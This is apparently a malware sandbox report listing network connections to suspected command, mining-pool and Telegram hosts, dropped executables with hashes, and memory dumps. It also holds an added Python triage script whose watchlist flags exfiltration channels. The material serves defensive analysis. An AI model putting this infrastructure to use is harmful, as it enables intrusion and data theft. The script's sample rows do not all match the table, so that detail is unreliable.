US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.187.206:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 164.237.32.52.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
GB 142.250.200.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
GB 45.74.38.211:4782 tcp
US 8.8.8.8:53 211.38.74.45.in-addr.arpa udp
NL 92.63.197.221:80 92.63.197.221 tcp
N/A 127.0.0.1:58578 tcp
US 8.8.8.8:53 221.197.63.92.in-addr.arpa udp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.35:80 c.pki.goog tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 cdn-downloads.com udp
NL 203.161.45.11:443 cdn-downloads.com tcp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.106:80 r11.o.lencr.org tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 106.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 88.221.134.209:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 169.175.125.74.in-addr.arpa udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
GB 142.250.200.14:443 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com tcp
RU 188.119.66.185:443 188.119.66.185 tcp
US 8.8.8.8:53 185.66.119.188.in-addr.arpa udp
NL 31.214.157.206:2024 tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 206.157.214.31.in-addr.arpa udp
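Most rows in the table above are resolver chatter (8.8.8.8:53), reverse lookups and background traffic of the sandbox's Firefox instance; the sessions worth pivoting on are the ones opened straight to an IP with no name, on odd ports, or to one server that answers under several names. The script below is an added triage example, not part of the report: SAMPLE is a subset of rows copied from the table, and BENIGN_SUFFIXES, IP_LOOKUP and WATCHLIST are analyst-maintained lists assumed for the example.

```python
"""Triage the sandbox 'Network' table: separate DNS and browser background
traffic from connections worth pivoting on (direct-to-IP sessions,
non-standard ports, one IP behind several hostnames)."""
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a subset of rows copied from the report's Network table.
SAMPLE = """\
RU 185.215.113.206:80 185.215.113.206 tcp
N/A 127.0.0.1:58570 tcp
US 8.8.8.8:53 youtube.com udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
GB 45.74.38.211:4782 tcp
NL 92.63.197.221:80 92.63.197.221 tcp
NL 203.161.45.11:443 exodus.lat tcp
US 172.67.74.152:443 api.ipify.org tcp
NL 203.161.45.11:443 cdn-downloads.com tcp
GB 88.221.135.106:80 r11.o.lencr.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
DE 95.179.241.203:80 pool.hashvault.pro tcp
RU 188.119.66.185:443 188.119.66.185 tcp
NL 31.214.157.206:2024 tcp
"""

# Row layout: <country> <dst-ip>:<port> [<name>] <proto>. The name is absent
# when the session was opened straight to an IP. IPv4 only, as in the table.
ROW = re.compile(
    r"^(?P<cc>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?:\s+(?P<name>\S+))?\s+(?P<proto>tcp|udp)$"
)

# Assumed analyst lists: Firefox/Google background traffic and certificate
# status endpoints seen in the table, plus names that deserve a call-out.
BENIGN_SUFFIXES = ("mozilla.net", "mozilla.com", "mozgcp.net", "mozaws.net",
                   "google.com", "youtube.com", "gvt1.com", "getpocket.com",
                   "pki.goog", "lencr.org", "akamai.net", "openh264.org")
IP_LOOKUP = {"api.ipify.org"}  # external-IP check, matches the report signature
WATCHLIST = {"pool.hashvault.pro": "mining pool",
             "api.telegram.org": "messaging API, a common exfiltration channel"}


@dataclass(frozen=True)
class Conn:
    cc: str
    ip: str
    port: int
    name: Optional[str]
    proto: str


def parse_rows(text: str) -> List[Conn]:
    conns = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        conns.append(Conn(m["cc"], m["ip"], int(m["port"]), m["name"], m["proto"]))
    return conns


def _under(name: str, suffixes) -> bool:
    # Match the zone itself or a subdomain of it, never 'notgoogle.com'.
    return any(name == s or name.endswith("." + s) for s in suffixes)


def classify(c: Conn) -> str:
    if ipaddress.ip_address(c.ip).is_loopback:
        return "loopback"
    if c.port == 53 and c.proto == "udp":
        return "dns_reverse" if c.name and c.name.endswith(".in-addr.arpa") else "dns"
    if not c.name or c.name == c.ip:
        return "direct_ip"          # no hostname at all: strongest pivot
    if c.name in IP_LOOKUP:
        return "ip_lookup"
    if c.name in WATCHLIST:
        return "watchlist"
    if _under(c.name, BENIGN_SUFFIXES):
        return "benign"
    return "review"


def triage(text: str) -> Dict[str, object]:
    buckets = defaultdict(set)
    hosts_per_ip = defaultdict(set)
    for c in parse_rows(text):
        cat = classify(c)
        buckets[cat].add((c.ip, c.port, c.name or "-", c.proto))
        if cat not in ("dns", "dns_reverse", "loopback") and c.name and c.name != c.ip:
            hosts_per_ip[c.ip].add(c.name)
    direct = buckets["direct_ip"]
    return {
        "buckets": {k: sorted(v) for k, v in buckets.items()},
        "pivots": sorted(f"{ip}:{port}" for ip, port, _, _ in direct),
        "nonstandard_ports": sorted(f"{ip}:{port}" for ip, port, _, _ in direct
                                    if port not in (80, 443)),
        # One server answering under several names is worth a second look.
        "shared_hosts": {ip: sorted(n) for ip, n in hosts_per_ip.items() if len(n) > 1},
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

On the rows above this yields five direct-to-IP pivots, two of them on non-standard ports (4782 and 2024), and one IP (203.161.45.11) serving both exodus.lat and cdn-downloads.com; the youtube.com, lencr.org and Mozilla rows drop out as background traffic.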

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe

MD5 08b1c924756ba9d72d0a3920d9b6378e
SHA1 7fc26d76ef9928fb3ef08223bbcecd0b53d0e43d
SHA256 e599f6a0e9fd997d4a4c027a36fe1125c8280925692889ad5be8e24206992a53
SHA512 df3cf9e9034fa7d69f7db6ebd43e378dc4e084c1df8242ac7fa710bd1181bdca042fe044b0903e9ccaeb61e5420ac7f349ab88a858aba889ac300678e5c6363b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe

MD5 d9e5b3e60c19b797259b97ef6e32f5aa
SHA1 7ed4d22371345fb3865c05b4875a8bd9c67fe402
SHA256 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e
SHA512 f7a505900f13d7f6670dd8801da2d61c0eb0d6f1c23f84a5147d667eb9a74a514ade6d3982a6583fbf3b9d6e6d143402902cbf763957c40aedb28e26c2543b2d

memory/1848-14-0x0000000000380000-0x0000000000822000-memory.dmp

memory/1848-15-0x0000000077814000-0x0000000077816000-memory.dmp

memory/1848-16-0x0000000000381000-0x00000000003AF000-memory.dmp

memory/1848-17-0x0000000000380000-0x0000000000822000-memory.dmp

memory/1848-18-0x0000000000380000-0x0000000000822000-memory.dmp

memory/1848-32-0x0000000000380000-0x0000000000822000-memory.dmp

memory/2564-30-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe

MD5 dce58ab08c3ab155903b939602299862
SHA1 8de86054f3bb235caa32ce7121760ff2b1477b45
SHA256 1a0bdc949fba81cad9505e074d506b5c9c60d46afc52a785962529eb12984650
SHA512 b752e15b2c2f5e8e826aab3834c84a91da55735d3a052baf362eef388b874830bb6b5ed784b13eb3cfc6d451181991491198a3666187faf79b9c27142235cea9

memory/2904-36-0x0000000000B60000-0x0000000000FEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

MD5 ff4cf493ac5f7663d1cfc243e6646eb7
SHA1 ff7184eae695580f1e86fac340925c7f01f4de6d
SHA256 72a99a945b705fc1c8fa59c3db6810be2aadeaecc34f954f5ab314574002d748
SHA512 1eef407d5bfa8b94bb98cb0a64e7c73cb94176507fa924642c6cf21192965ba8856390214379fddf192b88e19377768ead94fb4d393831e47ca230b6b168f14b

memory/4764-52-0x0000000000B20000-0x0000000000FAB000-memory.dmp

memory/2564-53-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

MD5 3a16d0e4e4522073da3c8a5a9f9e790b
SHA1 7a42a21a348d2e49c67b426d333a5c354ed2c83e
SHA256 ccc4dd64df98c26da462a17a8df9f927d02e202d88ada8cfba92b7bbeb954c3e
SHA512 1213c3e077b660afa65133f0b5943bd866f02d736284791dc99ae4d30c6ed7705eb55999cb4a3be1cc0a394111904154bc72a2d0f1fdc453893ecf9a4a25b99a

memory/2068-72-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp

MD5 e672d5907f1ce471d9784df64d8a306b
SHA1 6d094cae150d72b587c5480c15127d7059e16932
SHA256 9f9250be71bd6254790a9630990f4560d53995db3d8737b7f49986e3551283e5
SHA512 9cf10e997d8d99e6eb2f6ccac00ab365f63e03d96c2e2354fdf67683b85553a60cd9542cfb21cbea468c6a2bda454cde71937c0d21c4b738451b5e2c30690c39

memory/2564-78-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/2904-79-0x0000000000B60000-0x0000000000FEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-N55LT.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2904-88-0x0000000000B60000-0x0000000000FEF000-memory.dmp

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

MD5 b466bf1dc60388a22cb73be01ca6bf57
SHA1 21eb9665e42d6c4a8d9e764627049b2a6e3a69a4
SHA256 e5f0f0c3383080fc2702779e3040c490ab022af69a4bc8c61bf9b1f6514ae7ad
SHA512 6cb51dae17b3bcef6254ecf6538ecc49cdd53c40c979fd743f49987b28d05c033781b1047dbf25b203b02bf70ce4205dcc1cc5bbea46119cb0e2cd0ce140cbe2

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/1888-116-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1888-119-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2904-120-0x0000000000B60000-0x0000000000FEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe

MD5 69028d86ffdb8a59a9127b47dfb0ab38
SHA1 22d638c41ec4e8edfbb24d6ef6ccde318b581b84
SHA256 c006fc45ccd90fd47319f6aa0ee4694d8b17e4fd35b237ada54db1cc649b0367
SHA512 dbb7a989466b49646b44a0635a22188eba4139b57f7308753b6a1fb233f7f3c7a1fac91de399bb40115bb1a4a816caf789c318c44dfcabce8ef16958f11dceb6

memory/1912-124-0x0000000000390000-0x0000000000A30000-memory.dmp

memory/4764-125-0x0000000000B20000-0x0000000000FAB000-memory.dmp

memory/4764-128-0x0000000000B20000-0x0000000000FAB000-memory.dmp

memory/1912-129-0x0000000000390000-0x0000000000A30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

memory/412-157-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Audit.cmd

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

memory/412-190-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/2068-353-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2564-352-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1988-433-0x0000000000400000-0x00000000004BC000-memory.dmp

memory/1888-434-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe

MD5 d124690a731b9f9511d39dda3a5ef3d8
SHA1 26fc68f194903e93db04711c9524c442845b583c
SHA256 47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775
SHA512 e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634

memory/1500-458-0x0000000000F30000-0x00000000013BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

memory/1888-477-0x0000000060900000-0x0000000060992000-memory.dmp

memory/1888-476-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

memory/2564-531-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1500-535-0x0000000000F30000-0x00000000013BC000-memory.dmp

memory/1888-536-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2564-545-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1500-548-0x0000000000F30000-0x00000000013BC000-memory.dmp

memory/1888-549-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe

MD5 343a771efad9c921a3abb8d4201f6040
SHA1 b142b17a0dfb82b75071950eba743d0150ad12ff
SHA256 6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e
SHA512 d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2

memory/2388-569-0x0000000000970000-0x0000000000E6F000-memory.dmp

memory/2564-565-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/2388-571-0x0000000000970000-0x0000000000E6F000-memory.dmp

memory/1888-572-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe

MD5 8746d7ddcd593e7a9a38016b27a6dde0
SHA1 a505737a7bebefbd81d28d729e26187d15ea3aa7
SHA256 159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280
SHA512 9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.bin

MD5 7d530660909d5c3c0cd9924589e3debd
SHA1 f450f73ea7895ae450196da3512fed9f947d2733
SHA256 de0838186dd6e25c5a853345b55edc3ad69043baadac927a4f23b712a33d2f99
SHA512 c155c25d8d66a1bbec983c2b3f508afa6f0aa70efb72a6a346e4bc000c80137c8c242657d0e2f41aa14c4a9caa17ff3758bcdf3ba201311a0df7b74cd2a6df6e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 d6da39c2e4466300f5f4f9ed80dce6c0
SHA1 a12496e0edd7347e3c9ea1f75403e2551d0eb570
SHA256 e5c250ba7d29fdfaad27f9d6fd033c1976aec48312635babdc17a83c0be75bda
SHA512 366de3d60123b7e4fafa82a09dd499a13436bf7cf68f0625a16ab2f3c6492150468fa6ca67a6aacdb70cf7dad95d884a4000b1b665b5b323e09164ea36bb958c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\8f860d63-526d-4857-ba55-6808570005f6

MD5 52d9d7c2f84996a6701eea97f78c3203
SHA1 d8c8aa6253ae6ea471954266e1cd97e50663ef9c
SHA256 d2744be187dcabd196abe082ac76eba9860ce6e290b0fd2578c03847f56a3035
SHA512 913903739fa35db6b9b3e49f0921549b4b44ee0f0ce92bc339d5e28d96a4d91a132afc50f7bb9f0909c8e6a3cdc9a68bda20cdcf334fafecfd3c9e0c20f1822d

C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe

MD5 fc6804a55358a117689dab9333fd0ee5
SHA1 bbe4309bc6d99a67ecc0e866907889659d8e7031
SHA256 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58
SHA512 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c

memory/6684-1118-0x00000000008E0000-0x0000000000B88000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\activity-stream.discovery_stream.json.tmp

MD5 ae88242849a6d51be04b78fbf8b74631
SHA1 a8838e7963aba8c3714122d4206014f30a331124
SHA256 8d07e2105479829456f1ec6cc8b21b7c847aae9a789e9c97a5972b5de5d9ed0e
SHA512 6e5c297b69e1e7ba00e029159085b8e21d9f59eb2c6da6a02b06cca4e8ab88df7133e3cbf805bf19283d71c7187313cf298ff7299b43366dae3619537d80a35f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 d945fbb3b924db1e1211b0722639931f
SHA1 900e40b75656ac6538f30cdc31419ba624c273b5
SHA256 5da6c6afe36e513113146d84a72d0952909a5de715c0c9243c960fcd3f1bae8b
SHA512 fcf92f0ed5bd394b0d378c6af7978e452f4dd503cd3e6af826d6a0122c4673fef5df9a80a41ec56e0f5c5a6655776f5fb4b62fa4cb69b23b829a5e7ac8ebde2b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs.js

MD5 240aa917606e9603d9c56531e5fcc248
SHA1 ec084cda1ef97c713b9895689792170f0e2bc6b5
SHA256 0a0073df79b9f2edf714717e95139fcb3c7018d6fdb4ce284d177d8a2ed1570c
SHA512 642b7a91e05dab7eba7cc24800aa326b601a4a8c501743a0122f2930490ffb5e9f4f1caf9463097a605f5604acf11bd25a603befe3bbb726fff2d7af2078a708

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\697b3d51-6d7f-4ae5-903b-f565634fa029

MD5 5ba97bb6d510af87c8a930c37413985a
SHA1 78eb784564b8eefff844205beac5282ce84cedfb
SHA256 6f49eb4e5c48b68dff9ee2f68f37867e925a3c91ff343ff28e9cebe702e8300b
SHA512 0a6bd60ddb6c7b699a85a2375706d9fb74ec5ce1024290d2c64814e074041e316f9c3b2b4b9e862d9b5d2879e1e3b4f892dc2e438313b9d24f71e7baf682a453

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 f659f863761511507928ff4e38643533
SHA1 fa365535eaa24f444102c0d2ffd964dbc4bd038d
SHA256 a5f00757e75878dd37423f2f79d21677121e9aa858c5d0efb15ea4afe0620c69
SHA512 902e0b0d88ddd2b39eb702c126476a612945d25a49214b535e47d7f34547cd76f8e30266cf9282994e4600fc0cb9695f4f1621c219858831d56cf0ae30ac4592

memory/6684-1226-0x00000000008E0000-0x0000000000B88000-memory.dmp

memory/2564-1242-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\AlternateServices.bin

MD5 e970bedd5f188f99b24391a6e2910091
SHA1 70824f6958e3caba4215f8aa5898cd73ec042e0e
SHA256 8118cbe7b27682f8755bf6b7244c926c3fee3b8fc73b74703e2fd8d28d1b52cd
